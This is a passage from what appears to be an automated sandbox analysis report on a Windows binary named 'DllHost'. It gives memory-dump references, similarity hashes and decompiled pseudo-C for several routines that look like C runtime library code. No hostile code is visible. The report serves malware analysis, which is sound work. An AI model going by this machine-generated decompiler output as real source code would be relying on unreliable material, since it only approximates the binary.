                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                              • String ID: 123$123
                                                                                                                                                              • API String ID: 3668304517-1678940097
                                                                                                                                                              • Opcode ID: cc485447ade83df9d018b1fcf8e331f5d977bfac83474ebaa637983910e23bc9
                                                                                                                                                              • Instruction ID: 20f1cf1927b748dee9174225c31e85f269c0944bccde4c06b5eaf7044d8850f4
                                                                                                                                                              • Opcode Fuzzy Hash: cc485447ade83df9d018b1fcf8e331f5d977bfac83474ebaa637983910e23bc9
                                                                                                                                                              • Instruction Fuzzy Hash: 94317EB4F09D8A80FA09BF18B859378A271AF44BACFD04471C68D065A1DF6CA5DE9220
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191E1C60 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                              • API String ID: 4061214504-1276376045
                                                                                                                                                              • Opcode ID: a359485e1c9f920403d2126e4f0999f985aa714e7fc7486413114441b374367f
                                                                                                                                                              • Instruction ID: a872d06c57b3bc583c3e108f785609908435603fba361a63c39c336e3e77fe00
                                                                                                                                                              • Opcode Fuzzy Hash: a359485e1c9f920403d2126e4f0999f985aa714e7fc7486413114441b374367f
                                                                                                                                                              • Instruction Fuzzy Hash: BCF030A1B19E4682FB55BF20F4903B8A371BF84768F841035D61F861A4DE2CD4CED720
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191D528C Relevance: 7.8, APIs: 5, Instructions: 290COMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 84%
                                                                                                                                                              			E00007FF77FF7191D528C(signed int __ecx, void* __rax, long long __rbx, void* __rcx, intOrPtr* __rdx, long long __rdi, long long __rsi, signed char* __r8, signed char* __r9, long long _a8, long long _a16, long long _a24) {
				intOrPtr _v40;
				void* _t39;
				void* _t41;
				void* _t84;
				long long _t88;
				long long _t100;
				long long* _t121;
				signed char* _t131;

				_t84 = __rax;
				_a8 = __rbx;
				_a16 = __rsi;
				_a24 = __rdi;
				_t131 = __r9;
				if (__r8[4] == 0) goto 0x191d52c8;
				E00007FF77FF7191D3DE8(__rax);
				goto 0x191d52ce;
				r15d = 0;
				if (__rdi == 0) goto 0x191d544e;
				if (r15d == 0) goto 0x191d52ed;
				E00007FF77FF7191D3DE8(_t84);
				goto 0x191d52f0;
				if ( *((intOrPtr*)(__rdi + 0x10)) == dil) goto 0x191d544e;
				if (__r8[8] != 0) goto 0x191d5307;
				if ( *__r8 >= 0) goto 0x191d544e;
				if ( *__r8 < 0) goto 0x191d5315;
				_t121 = __r8[8] +  *__rdx;
				if (( *__r8 & 0x00000080) == 0) goto 0x191d534c;
				if (( *__r9 & 0x00000010) == 0) goto 0x191d534c;
				_t88 =  *0x1921b158; // 0x0
				if (_t88 == 0) goto 0x191d534c;
				_t39 =  *0x191f94c0();
				if (_t88 == 0) goto 0x191d546a;
				if (_t121 == 0) goto 0x191d546a;
				 *_t121 = _t88;
				goto 0x191d53ab;
				if (( *__r8 & 0x00000008) == 0) goto 0x191d536c;
				_t100 =  *((intOrPtr*)(__rcx + 0x28));
				if (_t100 == 0) goto 0x191d546f;
				if (_t121 == 0) goto 0x191d546f;
				 *_t121 = _t100;
				goto 0x191d53ab;
				if (( *__r9 & 0x00000001) == 0) goto 0x191d53bc;
				if ( *((intOrPtr*)(__rcx + 0x28)) == 0) goto 0x191d5474;
				if (_t121 == 0) goto 0x191d5474;
				E00007FF77FF7191D4380();
				if (__r9[0x14] != 8) goto 0x191d544a;
				if ( *_t121 == __rdi) goto 0x191d544a;
				E00007FF77FF7191D410C(_t39,  *_t121,  &(__r9[8]));
				 *_t121 = _t88;
				goto 0x191d544a;
				if ( *((intOrPtr*)(_t131 + 0x18)) == 0) goto 0x191d53d1;
				_t41 = E00007FF77FF7191D3DFC(_t88);
				goto 0x191d53d6;
				if (__rdi != 0) goto 0x191d540f;
				if ( *((intOrPtr*)(__rcx + 0x28)) == __rdi) goto 0x191d5479;
				if (_t121 == 0) goto 0x191d5479;
				E00007FF77FF7191D410C(_t41,  *((intOrPtr*)(__rcx + 0x28)), _t131 + 8);
				E00007FF77FF7191D4380();
				goto 0x191d544a;
				if ( *((intOrPtr*)(__rcx + 0x28)) == __rdi) goto 0x191d547e;
				if (_t121 == 0) goto 0x191d547e;
				if (0 == 0) goto 0x191d542f;
				E00007FF77FF7191D3DFC(_t88);
				goto 0x191d5432;
				if (__rdi == 0) goto 0x191d547e;
				asm("sbb ecx, ecx");
				_v40 =  ~__ecx + 1;
				goto 0x191d5450;
				return 0;
			}











                                                                                                                                                              0x7ff7191d528c
                                                                                                                                                              0x7ff7191d528c
                                                                                                                                                              0x7ff7191d5291
                                                                                                                                                              0x7ff7191d5296
                                                                                                                                                              0x7ff7191d52a5
                                                                                                                                                              0x7ff7191d52b7
                                                                                                                                                              0x7ff7191d52bd
                                                                                                                                                              0x7ff7191d52c6
                                                                                                                                                              0x7ff7191d52cb
                                                                                                                                                              0x7ff7191d52d1
                                                                                                                                                              0x7ff7191d52da
                                                                                                                                                              0x7ff7191d52dc
                                                                                                                                                              0x7ff7191d52eb
                                                                                                                                                              0x7ff7191d52f4
                                                                                                                                                              0x7ff7191d52fd
                                                                                                                                                              0x7ff7191d5301
                                                                                                                                                              0x7ff7191d5309
                                                                                                                                                              0x7ff7191d5312
                                                                                                                                                              0x7ff7191d5318
                                                                                                                                                              0x7ff7191d531e
                                                                                                                                                              0x7ff7191d5320
                                                                                                                                                              0x7ff7191d532a
                                                                                                                                                              0x7ff7191d532c
                                                                                                                                                              0x7ff7191d5335
                                                                                                                                                              0x7ff7191d533e
                                                                                                                                                              0x7ff7191d5344
                                                                                                                                                              0x7ff7191d534a
                                                                                                                                                              0x7ff7191d534f
                                                                                                                                                              0x7ff7191d5351
                                                                                                                                                              0x7ff7191d5358
                                                                                                                                                              0x7ff7191d5361
                                                                                                                                                              0x7ff7191d5367
                                                                                                                                                              0x7ff7191d536a
                                                                                                                                                              0x7ff7191d5370
                                                                                                                                                              0x7ff7191d5379
                                                                                                                                                              0x7ff7191d5382
                                                                                                                                                              0x7ff7191d538f
                                                                                                                                                              0x7ff7191d5399
                                                                                                                                                              0x7ff7191d53a2
                                                                                                                                                              0x7ff7191d53af
                                                                                                                                                              0x7ff7191d53b4
                                                                                                                                                              0x7ff7191d53b7
                                                                                                                                                              0x7ff7191d53c0
                                                                                                                                                              0x7ff7191d53c6
                                                                                                                                                              0x7ff7191d53cf
                                                                                                                                                              0x7ff7191d53d9
                                                                                                                                                              0x7ff7191d53df
                                                                                                                                                              0x7ff7191d53e8
                                                                                                                                                              0x7ff7191d53fa
                                                                                                                                                              0x7ff7191d5408
                                                                                                                                                              0x7ff7191d540d
                                                                                                                                                              0x7ff7191d5413
                                                                                                                                                              0x7ff7191d5418
                                                                                                                                                              0x7ff7191d541c
                                                                                                                                                              0x7ff7191d541e
                                                                                                                                                              0x7ff7191d542d
                                                                                                                                                              0x7ff7191d5435
                                                                                                                                                              0x7ff7191d543e
                                                                                                                                                              0x7ff7191d5446
                                                                                                                                                              0x7ff7191d544c
                                                                                                                                                              0x7ff7191d5469

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AdjustPointer
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1740715915-0
                                                                                                                                                              • Opcode ID: cab38ded3b901a016ec2b110b5e92ee53b72f54deac142631b12e35ec90ce533
                                                                                                                                                              • Instruction ID: b9f77f1fa65f949d569f0a3c5a71dc43c17c4661a2e9014b6ef8d31e3a696dd9
                                                                                                                                                              • Opcode Fuzzy Hash: cab38ded3b901a016ec2b110b5e92ee53b72f54deac142631b12e35ec90ce533
                                                                                                                                                              • Instruction Fuzzy Hash: 9AB1B421A0DE4281FA66BE15A448179E7F0AF40BACF854435DE4D07789EF3CE4DBA721
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191E9DF0 Relevance: 7.7, APIs: 5, Instructions: 158COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 25%
                                                                                                                                                              			E00007FF77FF7191E9DF0(signed int __ecx, long long __rbx, signed int __rcx, void* __rdx, signed int __r8, char _a8, long long _a16, unsigned int _a32, unsigned int _a36, signed short _a38) {
				void* _t31;
				signed short _t32;
				unsigned int _t35;
				unsigned int _t36;
				signed int _t41;
				signed int _t42;
				signed int _t43;
				signed int _t44;
				signed int _t45;
				void* _t53;
				unsigned int _t54;
				void* _t57;
				signed int _t69;
				signed int _t70;
				void* _t73;
				signed int _t74;
				void* _t75;
				signed int _t79;
				signed int _t82;
				signed long long _t86;
				void* _t103;
				void* _t104;

				_a16 = __rbx;
				r14d = 0;
				asm("movaps [esp+0x20], xmm6");
				_t41 = __ecx & 0x0000001f;
				r15d = __ecx;
				_t2 = _t104 + 0x10; // 0x10
				r13d = _t2;
				if ((__ecx & 0x00000008) == 0) goto 0x191e9e39;
				if (r12b >= 0) goto 0x191e9e39;
				E00007FF77FF7191EA708(_t41, __rcx);
				_t42 = _t41 & 0xfffffff7;
				goto 0x191ea01b;
				_t69 = 0x00000004 & r15b;
				if (_t69 == 0) goto 0x191e9e57;
				asm("dec ecx");
				if (_t69 >= 0) goto 0x191e9e57;
				E00007FF77FF7191EA708(_t42, __rcx);
				_t43 = _t42 & 0xfffffffb;
				goto 0x191ea01b;
				_t70 = sil & r15b;
				if (_t70 == 0) goto 0x191e9f1a;
				asm("dec ecx");
				if (_t70 >= 0) goto 0x191e9f1a;
				_t31 = E00007FF77FF7191EA708(_t43, __rcx);
				_t86 = __r8 & __rcx;
				if (_t70 == 0) goto 0x191e9ee5;
				if (_t86 == 0x2000) goto 0x191e9ecc;
				if (_t86 == 0x4000) goto 0x191e9eb3;
				_t73 = _t86 - __rcx;
				if (_t73 != 0) goto 0x191e9f12;
				asm("movsd xmm0, [ebp]");
				asm("comisd xmm0, [0x19e01]");
				asm("movsd xmm0, [0x1e339]");
				if (_t73 > 0) goto 0x191e9f0d;
				goto 0x191e9f06;
				asm("movsd xmm0, [ebp]");
				asm("comisd xmm0, [0x19de8]");
				if (_t73 > 0) goto 0x191e9ef4;
				asm("movsd xmm0, [0x1e31e]");
				goto 0x191e9f06;
				asm("movsd xmm0, [ebp]");
				asm("comisd xmm0, [0x19dcf]");
				if (_t73 <= 0) goto 0x191e9efe;
				asm("movsd xmm0, [0x1e305]");
				goto 0x191e9f0d;
				asm("movsd xmm0, [ebp]");
				asm("comisd xmm0, [0x19db6]");
				if (_t73 <= 0) goto 0x191e9efe;
				asm("movsd xmm0, [0x1e2e4]");
				goto 0x191e9f0d;
				asm("movsd xmm0, [0x1e2da]");
				asm("xorps xmm0, [0x18b33]");
				asm("movsd [ebp], xmm0");
				_t44 = _t43 & 0xfffffffe;
				goto 0x191ea01b;
				_t74 = r15b & 0x00000002;
				if (_t74 == 0) goto 0x191ea01b;
				asm("dec ecx");
				if (_t74 >= 0) goto 0x191ea01b;
				asm("movsd xmm0, [edx]");
				asm("xorps xmm6, xmm6");
				asm("ucomisd xmm0, xmm6");
				if (_t74 != 0) goto 0x191e9f4d;
				if (_t74 != 0) goto 0x191e9f4d;
				goto 0x191ea00c;
				_t32 = E00007FF77FF7191EA4C0(_t31, _t57, _t74,  &_a8);
				_t53 = _a8 + 0xfffffa00;
				asm("movsd [esp+0x88], xmm0");
				_t75 = _t53 - 0xfffffbce;
				if (_t75 >= 0) goto 0x191e9f7d;
				asm("mulsd xmm0, xmm6");
				goto 0x191ea007;
				r8d = r14d;
				asm("comisd xmm6, xmm0");
				r8b = _t75 > 0;
				_a38 = _t32 & 0x0000000f | r13w;
				if (_t53 - 0xfffffc03 >= 0) goto 0x191e9ff2;
				_t35 = _a32;
				_t54 = _a36;
				if ((sil & _t35) == 0) goto 0x191e9fcb;
				_t65 =  ==  ? 1 : 1;
				_t36 = _t35 >> 1;
				_a32 = _t36;
				_t79 = sil & _t54;
				if (_t79 == 0) goto 0x191e9fe4;
				asm("bts eax, 0x1f");
				_a32 = _t36;
				if (_t79 != 0) goto 0x191e9fc1;
				_a36 = _t54 >> 1;
				asm("movsd xmm0, [esp+0x88]");
				if (r8d == 0) goto 0x191ea007;
				asm("xorps xmm0, [0x18a39]");
				asm("movsd [ebp], xmm0");
				_t81 =  ==  ? 1 : 1;
				if (( ==  ? 1 : 1) == 0) goto 0x191ea018;
				E00007FF77FF7191EA708(_t44, _t103);
				_t45 = _t44 & 0xfffffffd;
				_t82 = r13b & r15b;
				if (_t82 == 0) goto 0x191ea034;
				asm("dec ecx");
				if (_t82 >= 0) goto 0x191ea034;
				E00007FF77FF7191EA708(_t45, _t103);
				asm("movaps xmm6, [esp+0x20]");
				r14b = (_t45 & 0xffffffef) == 0;
				return r14d;
			}

























                                                                                                                                                              0x7ff7191e9df0
                                                                                                                                                              0x7ff7191e9e04
                                                                                                                                                              0x7ff7191e9e07
                                                                                                                                                              0x7ff7191e9e11
                                                                                                                                                              0x7ff7191e9e17
                                                                                                                                                              0x7ff7191e9e1a
                                                                                                                                                              0x7ff7191e9e1a
                                                                                                                                                              0x7ff7191e9e21
                                                                                                                                                              0x7ff7191e9e26
                                                                                                                                                              0x7ff7191e9e2c
                                                                                                                                                              0x7ff7191e9e31
                                                                                                                                                              0x7ff7191e9e34
                                                                                                                                                              0x7ff7191e9e3e
                                                                                                                                                              0x7ff7191e9e41
                                                                                                                                                              0x7ff7191e9e43
                                                                                                                                                              0x7ff7191e9e48
                                                                                                                                                              0x7ff7191e9e4a
                                                                                                                                                              0x7ff7191e9e4f
                                                                                                                                                              0x7ff7191e9e52
                                                                                                                                                              0x7ff7191e9e5c
                                                                                                                                                              0x7ff7191e9e5f
                                                                                                                                                              0x7ff7191e9e65
                                                                                                                                                              0x7ff7191e9e6a
                                                                                                                                                              0x7ff7191e9e73
                                                                                                                                                              0x7ff7191e9e80
                                                                                                                                                              0x7ff7191e9e83
                                                                                                                                                              0x7ff7191e9e8b
                                                                                                                                                              0x7ff7191e9e93
                                                                                                                                                              0x7ff7191e9e95
                                                                                                                                                              0x7ff7191e9e98
                                                                                                                                                              0x7ff7191e9e9a
                                                                                                                                                              0x7ff7191e9e9f
                                                                                                                                                              0x7ff7191e9ea7
                                                                                                                                                              0x7ff7191e9eaf
                                                                                                                                                              0x7ff7191e9eb1
                                                                                                                                                              0x7ff7191e9eb3
                                                                                                                                                              0x7ff7191e9eb8
                                                                                                                                                              0x7ff7191e9ec0
                                                                                                                                                              0x7ff7191e9ec2
                                                                                                                                                              0x7ff7191e9eca
                                                                                                                                                              0x7ff7191e9ecc
                                                                                                                                                              0x7ff7191e9ed1
                                                                                                                                                              0x7ff7191e9ed9
                                                                                                                                                              0x7ff7191e9edb
                                                                                                                                                              0x7ff7191e9ee3
                                                                                                                                                              0x7ff7191e9ee5
                                                                                                                                                              0x7ff7191e9eea
                                                                                                                                                              0x7ff7191e9ef2
                                                                                                                                                              0x7ff7191e9ef4
                                                                                                                                                              0x7ff7191e9efc
                                                                                                                                                              0x7ff7191e9efe
                                                                                                                                                              0x7ff7191e9f06
                                                                                                                                                              0x7ff7191e9f0d
                                                                                                                                                              0x7ff7191e9f12
                                                                                                                                                              0x7ff7191e9f15
                                                                                                                                                              0x7ff7191e9f1a
                                                                                                                                                              0x7ff7191e9f1e
                                                                                                                                                              0x7ff7191e9f24
                                                                                                                                                              0x7ff7191e9f29
                                                                                                                                                              0x7ff7191e9f2f
                                                                                                                                                              0x7ff7191e9f39
                                                                                                                                                              0x7ff7191e9f3e
                                                                                                                                                              0x7ff7191e9f42
                                                                                                                                                              0x7ff7191e9f44
                                                                                                                                                              0x7ff7191e9f48
                                                                                                                                                              0x7ff7191e9f52
                                                                                                                                                              0x7ff7191e9f5b
                                                                                                                                                              0x7ff7191e9f61
                                                                                                                                                              0x7ff7191e9f6a
                                                                                                                                                              0x7ff7191e9f70
                                                                                                                                                              0x7ff7191e9f72
                                                                                                                                                              0x7ff7191e9f78
                                                                                                                                                              0x7ff7191e9f85
                                                                                                                                                              0x7ff7191e9f88
                                                                                                                                                              0x7ff7191e9f8c
                                                                                                                                                              0x7ff7191e9f9c
                                                                                                                                                              0x7ff7191e9faa
                                                                                                                                                              0x7ff7191e9fac
                                                                                                                                                              0x7ff7191e9fba
                                                                                                                                                              0x7ff7191e9fc4
                                                                                                                                                              0x7ff7191e9fc8
                                                                                                                                                              0x7ff7191e9fcb
                                                                                                                                                              0x7ff7191e9fcd
                                                                                                                                                              0x7ff7191e9fd4
                                                                                                                                                              0x7ff7191e9fd7
                                                                                                                                                              0x7ff7191e9fd9
                                                                                                                                                              0x7ff7191e9fdd
                                                                                                                                                              0x7ff7191e9fe9
                                                                                                                                                              0x7ff7191e9feb
                                                                                                                                                              0x7ff7191e9ff2
                                                                                                                                                              0x7ff7191e9ffe
                                                                                                                                                              0x7ff7191ea000
                                                                                                                                                              0x7ff7191ea007
                                                                                                                                                              0x7ff7191ea00c
                                                                                                                                                              0x7ff7191ea00e
                                                                                                                                                              0x7ff7191ea013
                                                                                                                                                              0x7ff7191ea018
                                                                                                                                                              0x7ff7191ea01b
                                                                                                                                                              0x7ff7191ea01e
                                                                                                                                                              0x7ff7191ea020
                                                                                                                                                              0x7ff7191ea025
                                                                                                                                                              0x7ff7191ea02c
                                                                                                                                                              0x7ff7191ea034
                                                                                                                                                              0x7ff7191ea040
                                                                                                                                                              0x7ff7191ea056

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _set_statfp
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1156100317-0
                                                                                                                                                              • Opcode ID: 5f14a6787c6c0828e72ea556b5c3a65fbea0f2d2126c6c45ee3f7c27df79daa1
                                                                                                                                                              • Instruction ID: cba420fd32e94aa1a55301e72af182e275b9069d4f538cef3ce070ed7f2d848b
                                                                                                                                                              • Opcode Fuzzy Hash: 5f14a6787c6c0828e72ea556b5c3a65fbea0f2d2126c6c45ee3f7c27df79daa1
                                                                                                                                                              • Instruction Fuzzy Hash: 55519637908D4647F667AE38B440276E271BF41378F944235EA5E365D0DF3CA4CBA610
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191D2080 Relevance: 7.6, APIs: 5, Instructions: 137memoryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00007FF77FF7191D2080(long long __rbx, long long __rcx, long long __rsi) {
				void* _t12;
				signed long long _t15;
				signed long long _t28;
				void* _t30;

				 *((long long*)(_t30 + 8)) = __rcx;
				_t28 = _t30 - 0x50 + 0x30;
				 *((long long*)(_t28 + 0x48)) = __rbx;
				 *((long long*)(_t28 + 0x50)) = __rsi;
				_t15 =  *0x192190a0; // 0x590452ce5669
				 *(_t28 + 0x10) = _t15 ^ _t28;
				if (__rcx != 0) goto 0x191d20cf;
				return E00007FF77FF7191D23B0(0, _t12,  *(_t28 + 0x10) ^ _t28);
			}







                                                                                                                                                              0x7ff7191d2080
                                                                                                                                                              0x7ff7191d208d
                                                                                                                                                              0x7ff7191d2092
                                                                                                                                                              0x7ff7191d2096
                                                                                                                                                              0x7ff7191d209a
                                                                                                                                                              0x7ff7191d20a4
                                                                                                                                                              0x7ff7191d20ae
                                                                                                                                                              0x7ff7191d20ce

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ByteCharMultiWide$AllocString
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 262959230-0
                                                                                                                                                              • Opcode ID: fa3e3861e6af13701dad676acc870c37c227b0d3fe0df65cc73041a7c76e61d7
                                                                                                                                                              • Instruction ID: c7ebff8f108bd2b50ac452843f9268598c94530e5cea16b3a3c70460fedfe0d2
                                                                                                                                                              • Opcode Fuzzy Hash: fa3e3861e6af13701dad676acc870c37c227b0d3fe0df65cc73041a7c76e61d7
                                                                                                                                                              • Instruction Fuzzy Hash: 24418731A08E4685FB14AF61A8043B9A2F5BF447B8F944A34DA7E477D5DE3CD08B9360
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191F498C Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 85%
                                                                                                                                                              			E00007FF77FF7191F498C(signed int __ecx, long long __rbx, void* __rdx, long long __rsi, long long _a8, long long _a16) {
				signed int _t27;
				signed int _t28;
				signed int _t29;
				signed int _t30;
				signed int _t31;
				signed int _t42;
				signed int _t43;
				signed int _t44;
				signed int _t46;
				void* _t51;

				_a8 = __rbx;
				_a16 = __rsi;
				_t27 = __ecx & 0x0000001f;
				if ((__ecx & 0x00000008) == 0) goto 0x191f49be;
				if (sil >= 0) goto 0x191f49be;
				E00007FF77FF7191EA708(_t27, _t51);
				_t28 = _t27 & 0xfffffff7;
				goto 0x191f4a15;
				_t42 = 0x00000004 & dil;
				if (_t42 == 0) goto 0x191f49d9;
				asm("dec eax");
				if (_t42 >= 0) goto 0x191f49d9;
				E00007FF77FF7191EA708(_t28, _t51);
				_t29 = _t28 & 0xfffffffb;
				goto 0x191f4a15;
				_t43 = dil & 0x00000001;
				if (_t43 == 0) goto 0x191f49f5;
				asm("dec eax");
				if (_t43 >= 0) goto 0x191f49f5;
				E00007FF77FF7191EA708(_t29, _t51);
				_t30 = _t29 & 0xfffffffe;
				goto 0x191f4a15;
				_t44 = dil & 0x00000002;
				if (_t44 == 0) goto 0x191f4a15;
				asm("dec eax");
				if (_t44 >= 0) goto 0x191f4a15;
				if ((dil & 0x00000010) == 0) goto 0x191f4a12;
				E00007FF77FF7191EA708(_t30, _t51);
				_t31 = _t30 & 0xfffffffd;
				_t46 = dil & 0x00000010;
				if (_t46 == 0) goto 0x191f4a2f;
				asm("dec eax");
				if (_t46 >= 0) goto 0x191f4a2f;
				E00007FF77FF7191EA708(_t31, _t51);
				return 0 | (_t31 & 0xffffffef) == 0x00000000;
			}













                                                                                                                                                              0x7ff7191f498c
                                                                                                                                                              0x7ff7191f4991
                                                                                                                                                              0x7ff7191f49a0
                                                                                                                                                              0x7ff7191f49a8
                                                                                                                                                              0x7ff7191f49ad
                                                                                                                                                              0x7ff7191f49b4
                                                                                                                                                              0x7ff7191f49b9
                                                                                                                                                              0x7ff7191f49bc
                                                                                                                                                              0x7ff7191f49c3
                                                                                                                                                              0x7ff7191f49c6
                                                                                                                                                              0x7ff7191f49c8
                                                                                                                                                              0x7ff7191f49cd
                                                                                                                                                              0x7ff7191f49cf
                                                                                                                                                              0x7ff7191f49d4
                                                                                                                                                              0x7ff7191f49d7
                                                                                                                                                              0x7ff7191f49d9
                                                                                                                                                              0x7ff7191f49dd
                                                                                                                                                              0x7ff7191f49df
                                                                                                                                                              0x7ff7191f49e4
                                                                                                                                                              0x7ff7191f49eb
                                                                                                                                                              0x7ff7191f49f0
                                                                                                                                                              0x7ff7191f49f3
                                                                                                                                                              0x7ff7191f49f5
                                                                                                                                                              0x7ff7191f49f9
                                                                                                                                                              0x7ff7191f49fb
                                                                                                                                                              0x7ff7191f4a00
                                                                                                                                                              0x7ff7191f4a06
                                                                                                                                                              0x7ff7191f4a0d
                                                                                                                                                              0x7ff7191f4a12
                                                                                                                                                              0x7ff7191f4a15
                                                                                                                                                              0x7ff7191f4a19
                                                                                                                                                              0x7ff7191f4a1b
                                                                                                                                                              0x7ff7191f4a20
                                                                                                                                                              0x7ff7191f4a27
                                                                                                                                                              0x7ff7191f4a45

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _set_statfp
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1156100317-0
                                                                                                                                                              • Opcode ID: 0c453a26a65cc264f34480e959e92e92ba93ba76e5a719f7620f73cb9509edd8
                                                                                                                                                              • Instruction ID: 5583bf7811c06af886590b70bbac52af3c57b07a84e4ab4f4221947ea225fe35
                                                                                                                                                              • Opcode Fuzzy Hash: 0c453a26a65cc264f34480e959e92e92ba93ba76e5a719f7620f73cb9509edd8
                                                                                                                                                              • Instruction Fuzzy Hash: 8E11B623E98E0B01F6543929F4893759071AF557B8FC90630E76F162DAAE6C58CF7128
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191C90F0 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 385COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 80%
